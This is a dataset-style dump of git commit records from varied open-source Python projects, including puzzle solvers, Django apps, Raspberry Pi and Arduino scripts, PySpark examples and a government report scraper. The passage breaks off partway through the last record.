commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
7b949393c0cf20b9f21ff3e743a6ad35b3cccb49 | Create 22.py | imylyanyk/AdventOfCode | 22.py | 22.py | import copy
import math
# [ 0 | 1 | 2 | 3 | 4 | 5 ]
#spell = [spell id | mana | damage | armor | mana | timer]
spells = [(0, 53, 4, 0, 0, 0), (1, 73, 2, 2, 0, 0), (2, 113, 0, 0, 0, 6), (3, 173, 3, 0, 0, 6), (4, 229, 0, 0, 101, 5)]
#2 = Shield
#timer = [spell id, turns left]
bossDamage = 9
Inf = 100000
best = Inf
def minManaToWin(me, boss, mana, manaUsed, timers, myMove):
#print(me, boss, mana, manaUsed, timers, myMove)
global spells, bossDamage, Inf, best
if me > 0 and boss <= 0:
#win
print(manaUsed)
best = min(best, manaUsed)
return 0
if me <= 0:
return Inf
if manaUsed > best:
return Inf
if myMove:
me -= 1
if me <= 0:
return Inf
#apply timers
shieldOn = False
new_timers = []
for timer in timers:
if timer[0] == 2:
shieldOn = True
spell = spells[timer[0]]
mana += spell[4]
me += spell[3]
boss -= spell[2]
if timer[1] > 1:
new_timers += [[timer[0], timer[1] - 1]]
if me > 0 and boss <= 0:
#win
print(manaUsed)
best = min(best, manaUsed)
return 0
res = Inf
if myMove:
for spell in spells:
if spell[1] <= mana:
if spell[5] == 0:
#immediately
tmp = minManaToWin(me + spell[3], boss - spell[2], mana - spell[1], manaUsed + spell[1], new_timers, False)
res = min(res, tmp + spell[1])
else:
inUse = False
for t in new_timers:
if t[0] == spell[0]:
#already appled spell
inUse = True
break
if inUse:
continue
#add timer
tmp = minManaToWin(me, boss, mana - spell[1], manaUsed + spell[1], new_timers + [[spell[0], spell[5]]], False)
res = min(res, tmp + spell[1])
else:
#boss' move
myArmor = 7 if shieldOn else 0
me -= bossDamage - myArmor
tmp = minManaToWin(me, boss, mana, manaUsed, new_timers, True)
res = min(res, tmp)
return res
result = minManaToWin(50, 51, 500, 0, [], True)
print ('res =', result)
| mit | Python |
|
62237000f3ae92638214d96f323a81d6a492d9cd | Update existing FAs with current tier programs (#4829) | mitodl/micromasters,mitodl/micromasters,mitodl/micromasters,mitodl/micromasters | financialaid/management/commands/migrate_finaid_program_tiers.py | financialaid/management/commands/migrate_finaid_program_tiers.py | """
Update FinancialAid objects with current tier program
"""
from django.core.management import BaseCommand, CommandError
from financialaid.models import FinancialAid, TierProgram
class Command(BaseCommand):
"""
Updates the existing financial aid objects to current tier programs
"""
help = "Updates the existing financial aid objects to current tier programs"
def handle(self, *args, **kwargs): # pylint: disable=unused-argument
fin_aids = FinancialAid.objects.filter(
tier_program__current=False,
)
updated_count = 0
for financial_aid in fin_aids:
try:
threshold = financial_aid.tier_program.income_threshold
tier_program = TierProgram.objects.get(
income_threshold=threshold,
current=True,
)
except TierProgram.DoesNotExist:
raise CommandError(
'Could not find a current tier program with threshold "{}" for financial aid {}'.format(
threshold,
financial_aid.id
)
)
except TierProgram.MultipleObjectsReturned:
raise CommandError(
'There are multiple tier programs with threshold "{}"'.format(threshold)
)
financial_aid.tier_program = tier_program
financial_aid.save_and_log(None)
updated_count += 1
self.stdout.write(self.style.SUCCESS('Updated {} financial aid instances'.format(updated_count)))
| bsd-3-clause | Python |
|
57af6d6d8b4c67f7b437f512e4d8eb4ea66a20f9 | Add morse script | OiNutter/microbit-scripts | morse/morse.py | morse/morse.py | # Import modules
from microbit import *
# define morse code dictionary
morse = {
"a": ".-",
"b": "-...",
"c": "-.-.",
"d": "-..",
"e": ".",
"f": "..-.",
"s": "...",
"o": "---",
"m": "--",
"1": ".----",
"2": "..---",
"3": "...--",
"4": "....-",
"5": ".....",
"6": "-....",
"7:" "--...",
"8": "---..",
"9": "----.",
"0": "-----"
}
current_letter = ""
pressed = 0
paused = 0
letters = []
def detect_dot_dash(time_pressed):
return "." if time_pressed <= 50 else "-"
def get_letter(code):
global morse
for key,value in morse.items():
if code == value:
return key
return ""
while True:
sleep(1) # do not use all the cpu power
# make a loop to test for the button being pressed
if button_a.is_pressed():
if paused >= 100:
letters.append(get_letter(current_letter))
current_letter = ""
if paused >= 200:
letters.append("_")
paused = 0
pressed = 1
while button_a.is_pressed():
# wait until the button is not pressed any more
sleep(1) # do not use all the cpu power
pressed += 1
# measure the time
current_letter += detect_dot_dash(pressed)
paused = 1
else:
if paused > 0:
paused +=1
if button_b.is_pressed() or accelerometer.current_gesture() == "shake":
letters.append(get_letter(current_letter))
display.scroll("".join(letters))
paused = 0
pressed = 0
current_letter = ""
letters = []
| mit | Python |
|
9609529e3a5c25c37be342d2bd1efe33e25128ff | Add IO file | ion201/thermopi,ion201/thermopi,ion201/thermopi,ion201/thermopi | IO.py | IO.py | import RPi.GPIO as GPIO
def gettemp():
return 80
def setfan(state):
pass
def setac(state):
if state:
# Always turn on the fan when the ac is on
setfan(True) | mit | Python |
|
47fffb67871325f1b12d6150f12b2d9c44984837 | implement top contributors functionality in gitguard | cs3219-team6/assignment-5 | gitguard.py | gitguard.py | import re
import subprocess
import github
"""
gitguard_extractor.py
Extracts data for the visualizer.
repo_link is in the format USER/REPO_NAME or ORGANIZATION/REPO_NAME
"""
REGEX_REPO_LINK_DELIMITER = '\s*/\s*'
def process_repo_link(repo_link):
#returns owner, repo_name
return re.compile(REGEX_REPO_LINK_DELIMITER).split(repo_link)
def get_top_contributor(repo_link):
return get_top_n_contributors(repo_link, 1)
def get_top_n_contributors(repo_link, n):
owner, repo = process_repo_link(repo_link)
# connect to github API
gh = github.GitHub()
contributors = gh.repos(owner)(repo).contributors.get()
answer = ''
persons = 0
for contributor in contributors:
answer += '%5d %s\n' % (contributor['contributions'], contributor['login'])
persons += 1
# only show top n contributors
if persons >= n:
break
answer += '\nTop contributors for %s!' % repo_link
return answer
| mit | Python |
|
a9fa88d11f5338f8662d4d6e7dc2103a80144be0 | Revert "Remove model" | shymonk/django-datatable,arambadk/django-datatable,arambadk/django-datatable,shymonk/django-datatable,arambadk/django-datatable,shymonk/django-datatable | table/models.py | table/models.py | from django.db import models
# Create your models here.
| mit | Python |
|
c821be39a3853bf8a14e8c4089904dfe633ad276 | Solve task #412 | Zmiecer/leetcode,Zmiecer/leetcode | 412.py | 412.py | class Solution(object):
def fizzBuzz(self, n):
"""
:type n: int
:rtype: List[str]
"""
def fizzBuzz(i, x):
return {1: str(i), 3: "Fizz", 5: "Buzz", 15: "FizzBuzz"}[x]
ans = []
x = 1
for i in range(1, n + 1):
if i % 3 == 0:
x *= 3
if i % 5 == 0:
x *= 5
ans.append(fizzBuzz(i, x))
x = 1
return ans
| mit | Python |
|
e51322e7ee4afabee8b98137bc5e56b0a0f803ec | Solve #461 | Zmiecer/leetcode,Zmiecer/leetcode | 461.py | 461.py | class Solution(object):
def hammingDistance(self, x, y):
"""
:type x: int
:type y: int
:rtype: int
"""
x, y = list(bin(x)[2:]), list(bin(y)[2:])
s1 = list('0' * max(len(x), len(y)))
s2 = list('0' * max(len(x), len(y)))
s1[len(s1) - len(x):] = x
s2[len(s2) - len(y):] = y
k = 0
for i in range(len(s1)):
if s1[i] != s2[i]:
k += 1
return k
| mit | Python |
|
2206f2dac5cb15c10fa59f14597133b6a0d3a314 | Create ALE.py | 4dsolutions/async_learning_engine | ALE.py | ALE.py | """
Asynchronous Learning Engine (ALE)
Supports PWS standard desktop (studio)
Mentor Queues
Load Balancing / Air Traffic Control
Courses / Flights
A mentor queue is a worker queue with
tasks pending, in process, complete.
The many subclasses of Task are only hinted
at in this overview.
Example Tasks (Transactions archiving to Chronofile):
Set start time on booked flight, notify students
Take Off
In-flight Services (the learning experience)
Land
Postmortem **/ Archive Stats
** sounds dire and we do try experimental courses
sometimes that "crash" but in this shoptalk it's
how we discuss any completed flight.
In-flight the students have a Call Bell for
special services. We run "shows" which in the
better schools are highly interactive and require
a lot of student activity. Passivism is a killer
when it comes to building confidence and competence
in one's tools, as Scott Gray would point out during
faculty meetings.
A normal / standard flight consists of working
through course materials in a PWS Studio with
asynchronous feedback from one or more mentors.
The "flight" (course) is also a unit of accounting
i.e. we containerize it in terms of fixed cost
overhead, tuition, compensation and so on. See
workflow diagrams.
ALE:
In the OO version, ALE is the root object, adding mixins as needed
Kirby Urner
Want graphics?
https://www.flickr.com/photos/kirbyurner/sets/72157654417641521
"""
class Flight(ALE):
pass
class AirTrafficUtils(ALE):
pass
class Passenger(AWS):
pass
class PWS:
pass
class Dispatcher(AirTrafficUtils):
pass
class Student(Passenger):
pass
class Task:
# Examples: Start Class, Submit Work, Annotate Materials, Return Work
pass
class Mentor(Oasis): # # Example mixin (ways to "phone home")
pass
class Course(Flight): # Expense Unit for accounting / bookkeeping
pass
class Oversight(ALE):
pass
class Admin(Oversight):
pass
class Recruiting(Mentor):
pass # Exhibited Mentors, free samples
class StudentSupport(Oversight):
pass # guidance functions ("Travel Agency")
| apache-2.0 | Python |
|
2e2a8f24cc8fc7e1614bf12a0d6d42c70d1efcf8 | Create GUI.py | kellogg76/ArduinoTelescopeDustCover | GUI.py | GUI.py | #!/usr/bin/python
from Tkinter import *
root = Tk()
root.title("Elentirmo Observatory Controller v0.1")
dust_cover_text = StringVar()
dust_cover_text.set('Cover Closed')
flat_box_text = StringVar()
flat_box_text.set('Flat Box Off')
def dust_cover_open():
print "Opening"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to OPEN the dust cover."
ser.write("O")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
dust_cover_label.config(bg="Green")
dust_cover_text.set('Cover is Open')
def dust_cover_close():
print "Closing"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to CLOSE the dust cover."
ser.write("C")
print "Closing serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
dust_cover_label.config(bg="red")
dust_cover_text.set('Cover is closed')
def flat_on():
print "Activating flat box"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to turn on the flat box via relay."
ser.write("F")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
flat_box_label.config(bg="Green")
flat_box_text.set('Flat Box on')
def flat_off():
print "Dectivating flat box"
## Open a serial connection with Arduino.
import time
import serial
ser = serial.Serial("COM9", 9600) # Open serial port that Arduino is using
time.sleep(3) # Wait 3 seconds for Arduino to reset
print ser # Print serial config
print "Sending serial command to turn off the flat box via relay."
ser.write("Q")
print "Opening serial connection."
ser.close()
# Reminder to close the connection when finished
if(ser.isOpen()):
print "Serial connection is still open."
flat_box_label.config(bg="red")
flat_box_text.set('Flat Box Off')
open_dust_cover_btn = Button(text=" Open Cover ", width=15, command=dust_cover_open)
open_dust_cover_btn.grid(row=0, column=0)
close_dust_cover_btn = Button(text=" Close Cover ", width=15, command=dust_cover_close)
close_dust_cover_btn.grid(row=1, column=0)
flat_box_on_btn = Button(text="Turn On Light", width=15, command=flat_on)
flat_box_on_btn.grid(row=0, column=2)
flat_box_off_btn = Button(text="Turn Off Light", width=15, command=flat_off)
flat_box_off_btn.grid(row=1, column=2)
status_label = Label(root, text=("Current Status"), width=15, fg="Black")
status_label.grid(row=2, column=1)
dust_cover_label = Label(root, textvariable=dust_cover_text, width=15, fg="Black", bg="Red")
dust_cover_label.grid(row=2, column=0)
flat_box_label = Label(root, textvariable=flat_box_text, width=15, fg="Black", bg="Red")
flat_box_label.grid(row=2, column=2)
root.mainloop()
| mit | Python |
|
6be70d01bdf58389db2a6adc4035f82669d02a61 | Allow use of GoogleMaps plugin without Multilingual support | cyberintruder/django-cms,chmberl/django-cms,owers19856/django-cms,jproffitt/django-cms,vstoykov/django-cms,MagicSolutions/django-cms,isotoma/django-cms,jproffitt/django-cms,chkir/django-cms,stefanw/django-cms,jeffreylu9/django-cms,divio/django-cms,Vegasvikk/django-cms,jrief/django-cms,pbs/django-cms,farhaadila/django-cms,chrisglass/django-cms,kk9599/django-cms,nimbis/django-cms,rsalmaso/django-cms,vad/django-cms,rscnt/django-cms,memnonila/django-cms,intip/django-cms,MagicSolutions/django-cms,stefanfoulis/django-cms,jrclaramunt/django-cms,SinnerSchraderMobileMirrors/django-cms,selecsosi/django-cms,donce/django-cms,liuyisiyisi/django-cms,jeffreylu9/django-cms,pbs/django-cms,liuyisiyisi/django-cms,jrclaramunt/django-cms,divio/django-cms,stefanfoulis/django-cms,astagi/django-cms,datakortet/django-cms,intip/django-cms,DylannCordel/django-cms,frnhr/django-cms,adaptivelogic/django-cms,stefanw/django-cms,qnub/django-cms,timgraham/django-cms,stefanw/django-cms,memnonila/django-cms,mkoistinen/django-cms,jeffreylu9/django-cms,vad/django-cms,AlexProfi/django-cms,intgr/django-cms,ojii/django-cms,sephii/django-cms,philippze/django-cms,rscnt/django-cms,kk9599/django-cms,pbs/django-cms,jsma/django-cms,astagi/django-cms,rscnt/django-cms,czpython/django-cms,jeffreylu9/django-cms,foobacca/django-cms,foobacca/django-cms,selecsosi/django-cms,donce/django-cms,SinnerSchraderMobileMirrors/django-cms,SachaMPS/django-cms,chkir/django-cms,11craft/django-cms,youprofit/django-cms,petecummings/django-cms,wyg3958/django-cms,frnhr/django-cms,foobacca/django-cms,pixbuffer/django-cms,datakortet/django-cms,vxsx/django-cms,datakortet/django-cms,driesdesmet/django-cms,bittner/django-cms,astagi/django-cms,netzkolchose/django-cms,owers19856/django-cms,netzkolchose/django-cms,wuzhihui1123/django-cms,wyg3958/django-cms,cyberintruder/django-cms,SofiaReis/django-cms,benzkji/django-cms,nimbis/django-cms,rryan/django-cms,takeshineshiro/django-cms,robmagee/django-cms,FinalAngel/django-cms,nostalgiaz/django-cms,andyzsf/django-cms,frnhr/django-cms,adaptivelogic/django-cms,dhorelik/django-cms,iddqd1/django-cms,jsma/django-cms,frnhr/django-cms,11craft/django-cms,saintbird/django-cms,adaptivelogic/django-cms,memnonila/django-cms,jrief/django-cms,pbs/django-cms,takeshineshiro/django-cms,MagicSolutions/django-cms,Vegasvikk/django-cms,evildmp/django-cms,AlexProfi/django-cms,jsma/django-cms,divio/django-cms,rsalmaso/django-cms,isotoma/django-cms,petecummings/django-cms,vxsx/django-cms,Livefyre/django-cms,11craft/django-cms,liuyisiyisi/django-cms,jalaziz/django-cms-grappelli-old,keimlink/django-cms,czpython/django-cms,keimlink/django-cms,stefanfoulis/django-cms,petecummings/django-cms,takeshineshiro/django-cms,ScholzVolkmer/django-cms,timgraham/django-cms,chkir/django-cms,foobacca/django-cms,stefanw/django-cms,jalaziz/django-cms-grappelli-old,rryan/django-cms,ScholzVolkmer/django-cms,qnub/django-cms,benzkji/django-cms,ScholzVolkmer/django-cms,kk9599/django-cms,nimbis/django-cms,webu/django-cms,nostalgiaz/django-cms,nostalgiaz/django-cms,vad/django-cms,mkoistinen/django-cms,selecsosi/django-cms,jsma/django-cms,keimlink/django-cms,timgraham/django-cms,yakky/django-cms,isotoma/django-cms,vxsx/django-cms,jrclaramunt/django-cms,intgr/django-cms,pancentric/django-cms,sznekol/django-cms,pixbuffer/django-cms,leture/django-cms,mkoistinen/django-cms,irudayarajisawa/django-cms,czpython/django-cms,intip/django-cms,Jaccorot/django-cms,sephii/django-cms,irudayarajisawa/django-cms,jproffitt/django-cms,wuzhihui1123/django-cms,vstoykov/django-cms,rsalmaso/django-cms,farhaadila/django-cms,vad/django-cms,SofiaReis/django-cms,360youlun/django-cms,DylannCordel/django-cms,intgr/django-cms,jrief/django-cms,leture/django-cms,SofiaReis/django-cms,yakky/django-cms,Vegasvikk/django-cms,owers19856/django-cms,mkoistinen/django-cms,saintbird/django-cms,yakky/django-cms,jrief/django-cms,robmagee/django-cms,pixbuffer/django-cms,philippze/django-cms,saintbird/django-cms,ojii/django-cms,360youlun/django-cms,webu/django-cms,sznekol/django-cms,dhorelik/django-cms,wuzhihui1123/django-cms,evildmp/django-cms,yakky/django-cms,Livefyre/django-cms,netzkolchose/django-cms,josjevv/django-cms,bittner/django-cms,rryan/django-cms,SmithsonianEnterprises/django-cms,evildmp/django-cms,farhaadila/django-cms,nimbis/django-cms,sznekol/django-cms,ojii/django-cms,sephii/django-cms,Livefyre/django-cms,rryan/django-cms,FinalAngel/django-cms,jalaziz/django-cms-grappelli-old,FinalAngel/django-cms,bittner/django-cms,SachaMPS/django-cms,webu/django-cms,pancentric/django-cms,driesdesmet/django-cms,benzkji/django-cms,divio/django-cms,isotoma/django-cms,VillageAlliance/django-cms,iddqd1/django-cms,intip/django-cms,evildmp/django-cms,chrisglass/django-cms,benzkji/django-cms,360youlun/django-cms,sephii/django-cms,pancentric/django-cms,datakortet/django-cms,dhorelik/django-cms,cyberintruder/django-cms,andyzsf/django-cms,iddqd1/django-cms,andyzsf/django-cms,SachaMPS/django-cms,czpython/django-cms,nostalgiaz/django-cms,robmagee/django-cms,vstoykov/django-cms,chmberl/django-cms,philippze/django-cms,wyg3958/django-cms,intgr/django-cms,andyzsf/django-cms,leture/django-cms,chmberl/django-cms,vxsx/django-cms,Livefyre/django-cms,FinalAngel/django-cms,DylannCordel/django-cms,josjevv/django-cms,11craft/django-cms,jproffitt/django-cms,selecsosi/django-cms,irudayarajisawa/django-cms,youprofit/django-cms,VillageAlliance/django-cms,rsalmaso/django-cms,netzkolchose/django-cms,SinnerSchraderMobileMirrors/django-cms,bittner/django-cms,VillageAlliance/django-cms,Jaccorot/django-cms,driesdesmet/django-cms,SmithsonianEnterprises/django-cms,donce/django-cms,youprofit/django-cms,AlexProfi/django-cms,wuzhihui1123/django-cms,qnub/django-cms,stefanfoulis/django-cms,Jaccorot/django-cms,josjevv/django-cms,SmithsonianEnterprises/django-cms | cms/plugins/googlemap/cms_plugins.py | cms/plugins/googlemap/cms_plugins.py | from django.conf import settings
from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from cms.plugins.googlemap.models import GoogleMap
from cms.plugins.googlemap.settings import GOOGLE_MAPS_API_KEY
from django.forms.widgets import Media
class GoogleMapPlugin(CMSPluginBase):
model = GoogleMap
name = _("Google Map")
render_template = "cms/plugins/googlemap.html"
def render(self, context, instance, placeholder):
context.update({
'object':instance,
'placeholder':placeholder,
})
return context
def get_plugin_media(self, request, context, plugin):
if 'GOOGLE_MAPS_API_KEY' in context:
key = context['GOOGLE_MAPS_API_KEY']
else:
key = GOOGLE_MAPS_API_KEY
lang = getattr(request, 'LANGUAGE_CODE', settings.LANGUAGE_CODE[0:2])
return Media(js = ('http://maps.google.com/maps?file=api&v=2&key=%s&hl=%s' % (key, lang),))
plugin_pool.register_plugin(GoogleMapPlugin) | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from cms.plugins.googlemap.models import GoogleMap
from cms.plugins.googlemap.settings import GOOGLE_MAPS_API_KEY
from cms.plugins.googlemap import settings
from django.forms.widgets import Media
class GoogleMapPlugin(CMSPluginBase):
model = GoogleMap
name = _("Google Map")
render_template = "cms/plugins/googlemap.html"
def render(self, context, instance, placeholder):
context.update({
'object':instance,
'placeholder':placeholder,
})
return context
def get_plugin_media(self, request, context, plugin):
if 'GOOGLE_MAPS_API_KEY' in context:
key = context['GOOGLE_MAPS_API_KEY']
else:
key = GOOGLE_MAPS_API_KEY
return Media(js = ('http://maps.google.com/maps?file=api&v=2&key=%s&hl=%s' % (key, request.LANGUAGE_CODE),))
plugin_pool.register_plugin(GoogleMapPlugin) | bsd-3-clause | Python |
5c952e7a54bcff7bcdbd3b2a2d85f1f93ce95242 | add first test: config+store | icing/mod_md,icing/mod_md,icing/mod_md,icing/mod_md,icing/mod_md | test/test_1100_conf_store.py | test/test_1100_conf_store.py | # test mod_md basic configurations
import os.path
import pytest
import re
import subprocess
import sys
import time
from ConfigParser import SafeConfigParser
from datetime import datetime
from httplib import HTTPConnection
from testbase import TestEnv
config = SafeConfigParser()
config.read('test.ini')
PREFIX = config.get('global', 'prefix')
def setup_module(module):
print("setup_module module:%s" % module.__name__)
TestEnv.init()
TestEnv.apache_err_reset()
TestEnv.APACHE_CONF_SRC = "test_configs_data"
status = TestEnv.apachectl(None, "start")
assert status == 0
def teardown_module(module):
print("teardown_module module:%s" % module.__name__)
status = TestEnv.apachectl(None, "stop")
class TestConf:
def setup_method(self, method):
print("setup_method: %s" % method.__name__)
(self.errors, self.warnings) = TestEnv.apache_err_count()
TestEnv.clear_store()
def teardown_method(self, method):
print("teardown_method: %s" % method.__name__)
# --------- add to store ---------
@pytest.mark.parametrize("confFile,dnsLists", [
("test_001", [["example.org", "www.example.org", "mail.example.org"]]),
("test_002", [["example.org", "www.example.org", "mail.example.org"], ["example2.org", "www.example2.org", "mail.example2.org"]])
])
def test_001(self, confFile, dnsLists):
# just one ManagedDomain definition
assert TestEnv.apachectl(confFile, "graceful") == 0
assert TestEnv.is_live(TestEnv.HTTPD_URL, 1)
for i in range (0, len(dnsLists)):
self._check_md(dnsLists[i][0], dnsLists[i], 1)
# --------- _utils_ ---------
def _new_errors(self):
(errors, warnings) = TestEnv.apache_err_count()
return errors - self.errors
def _new_warnings(self):
(errors, warnings) = TestEnv.apache_err_count()
return warnings - self.warnings
def _check_md(self, name, dnsList, state):
jout = TestEnv.a2md(["list"])['jout']
assert jout
output = jout['output']
mdFound = False
for i in range (0, len(output)):
md = output[i]
if name == md['name']:
mdFound = True
assert md['domains'] == dnsList
assert md['state'] == state
assert mdFound == True | apache-2.0 | Python |
|
c15c4a663c257cad6763cf92c50b7ad706017c74 | Remove extraneous imports in the base view package | eskwire/evesrp,eskwire/evesrp,paxswill/evesrp,eskwire/evesrp,paxswill/evesrp,paxswill/evesrp,eskwire/evesrp | evesrp/views/__init__.py | evesrp/views/__init__.py | from flask import render_template
from flask.ext.login import login_required
from .. import app
@app.route('/')
@login_required
def index():
return render_template('base.html')
| from collections import OrderedDict
from urllib.parse import urlparse
import re
from flask import render_template, redirect, url_for, request, abort, jsonify,\
flash, Markup, session
from flask.views import View
from flask.ext.login import login_user, login_required, logout_user, \
current_user
from flask.ext.wtf import Form
from flask.ext.principal import identity_changed, AnonymousIdentity
from sqlalchemy.orm.exc import NoResultFound
from wtforms.fields import StringField, PasswordField, SelectField, \
SubmitField, TextAreaField, HiddenField
from wtforms.fields.html5 import URLField, DecimalField
from wtforms.widgets import HiddenInput
from wtforms.validators import InputRequired, ValidationError, AnyOf, URL
from .. import app, auth_methods, db, requests_session, killmail_sources
from ..auth import SubmitRequestsPermission, ReviewRequestsPermission, \
PayoutRequestsPermission, admin_permission
from ..auth.models import User, Group, Division, Pilot
from ..models import Request, Modifier, Action
@app.route('/')
@login_required
def index():
return render_template('base.html')
| bsd-2-clause | Python |
d40b4c250f7d1c0c6a6c198b3e1ea69e0049830e | Create syb.py | supersonictw/syb | syb.py | syb.py | # -*- coding: utf-8 -*-
"""
Star Yuuki Bot
~~~~~~~~~~~
LineClient for sending and receiving message from LINE server.
Copyright: (c) 2015 SuperSonic Software Foundation and Star Inc.
Website:
SuperSonic Software Foundation: http://supersonic-org.cf
Star Inc.: http://startw.cf
License: Mozilla Public License 2.0
"""
print "Come Soon..."
| mpl-2.0 | Python |
|
774877893b9f94711b717d01b896deefe65eb211 | create file | jbelgamazzi/recomendacao_semantica | app.py | app.py | """
@import rdflib external lib
"""
import rdflib
jsonldData = open("LearningObjectsExpanded.jsonld").read()
queryData = open("findRecommendations.query").read()
graph = rdflib.Graph()
graph.parse(data=jsonldData,format='json-ld')
results = graph.query(queryData)
for result in results:
print(result)
| mit | Python |
|
921221e4ad7d74b6f9d8b0b75417fe84fd01715f | Add script to concatenate all titers to one file tracking source/passage Fixes #76 | blab/nextstrain-db,blab/nextstrain-db,nextstrain/fauna,nextstrain/fauna | tdb/concatenate.py | tdb/concatenate.py | import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--files', nargs='*', default=[], help="tsvs that will be concatenated")
parser.add_argument('-o', '--output', type=str, default="data/titers_complete.tsv")
def concat(files,out):
with open(out, 'w') as o:
for filename in files:
print "Concatenating and annotating %s into %s." % (filename, out)
if "cdc" in filename.lower():
source = "cdc"
elif "crick" in filename.lower():
source = "crick"
else:
source = "none"
if "egg" in filename.lower():
passage = "egg"
elif "cell" in filename.lower():
passage = "egg"
else:
passage = "none"
with open(filename, 'r') as f:
for line in f.readlines():
print line
line = line.strip()
l = "%s\t%s\t%s\n" % (line, source, passage)
o.write(l)
if __name__=="__main__":
args = parser.parse_args()
concat(args.files, args.output)
| agpl-3.0 | Python |
|
c26d570e949483224b694574120e37a215dcc348 | Add dataframewriter api example to python graphene (#4520) | intel-analytics/analytics-zoo,intel-analytics/analytics-zoo,intel-analytics/analytics-zoo | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | from pyspark.sql.functions import *
from pyspark.sql import Row, Window, SparkSession, SQLContext
from pyspark.sql.types import IntegerType, FloatType, StringType
from pyspark.sql import functions as F
from pyspark.sql.functions import rank, min, col, mean
import random
import os
import tempfile
def sql_dataframe_writer_api(spark):
print("Start running dataframe writer API")
sc = spark.sparkContext
sqlContext = SQLContext(sc)
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
# bucketBy and saveAsTable
# make sure that this is no work/spark-warehouse/bucketed_table/ under current path
df.write.format('parquet').bucketBy(100, 'age', 'name').mode("overwrite").saveAsTable('bucketed_table', path="work/spark-warehouse/bucketed_table/")
print("bucketBy and saveAsTable API finished")
# csv and option
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
df.write.option('header','true').csv(os.path.join(tempfile.mkdtemp(), 'data'))
print("csv and option API finished")
# format
df.write.format('json').save(os.path.join(tempfile.mkdtemp(), 'data'))
print("format API finished")
# insertInto
df2 = spark.createDataFrame([(3, "Alice")], ["age", "name"])
df2.write.insertInto("bucketed_table")
print("insertInto API finished")
# jdbc
# json
df.write.json(os.path.join(tempfile.mkdtemp(), 'data'))
print("json API finished")
# mode
df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("mode API finished")
# orc
orc_df = spark.read.orc('/ppml/trusted-big-data-ml/work/spark-2.4.6/python/test_support/sql/orc_partitioned')
orc_df.write.orc(os.path.join(tempfile.mkdtemp(), 'data'))
print("orc API finished")
# parquet
df.write.parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("parquet API finished")
# partitionBy
df.write.partitionBy('age').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("partitionBy API finished")
# save
df.write.mode("append").save(os.path.join(tempfile.mkdtemp(), 'data'))
print("save API finished")
# sortBy
# make sure that this is no work/spark-warehouse/sorted_bucketed_table/ under current path
df.write.format('parquet').bucketBy(100, 'name').sortBy('age').mode("overwrite").saveAsTable('sorted_bucketed_table', path="work/spark-warehouse/sorted_bucketed_table/")
print("sortBy API finished")
# text
df = spark.createDataFrame([1.0, 2.0, 3.0], StringType())
df.write.text(os.path.join(tempfile.mkdtemp(), 'data'))
print("text API finished")
print("Finish running dataframe writer API")
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("Python Spark SQL Dataframe Writer example") \
.config("spark.some.config.option", "some-value") \
.getOrCreate()
sql_dataframe_writer_api(spark)
| apache-2.0 | Python |
|
ad489edc8059b75d9ec78d0aeb03ac3592b93923 | Add Federal Labor Relations Authority. | lukerosiak/inspectors-general,divergentdave/inspectors-general | inspectors/flra.py | inspectors/flra.py | #!/usr/bin/env python
import datetime
import logging
import os
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from utils import utils, inspector
# https://www.flra.gov/OIG
# Oldest report: 1999
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
#
AUDIT_REPORTS_URL = "https://www.flra.gov/IG_audit-reports"
INTERNAL_REVIEWS_URL = "https://www.flra.gov/IG_internal-reviews"
QA_REVIEWS_URL = "https://www.flra.gov/OIG_QA_Reviews"
SEMIANNUAL_REPORTS_URL = "https://www.flra.gov/IG_semi-annual_reports"
def run(options):
year_range = inspector.year_range(options)
# Pull the reports
for url in [AUDIT_REPORTS_URL, INTERNAL_REVIEWS_URL, QA_REVIEWS_URL, SEMIANNUAL_REPORTS_URL]:
doc = BeautifulSoup(utils.download(url))
results = doc.select("div.node ul li")
for result in results:
report = report_from(result, url, year_range)
if report:
inspector.save_report(report)
def report_from(result, landing_url, year_range):
title = result.text.strip()
if 'Non-Public Report' in title:
unreleased = True
report_url = None
report_id = "-".join(title.split())
else:
unreleased = False
link = result.find("a")
# Some reports have incorrect relative paths
relative_report_url = link.get('href').replace("../", "")
report_url = urljoin(landing_url, relative_report_url)
report_filename = report_url.split("/")[-1]
report_id, _ = os.path.splitext(report_filename)
estimated_date = False
try:
published_on = datetime.datetime.strptime(title, '%B %Y')
except ValueError:
# For reports where we can only find the year, set them to Nov 1st of that year
published_on_year = int(result.find_previous("p").text.strip())
published_on = datetime.datetime(published_on_year, 11, 1)
estimated_date = True
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
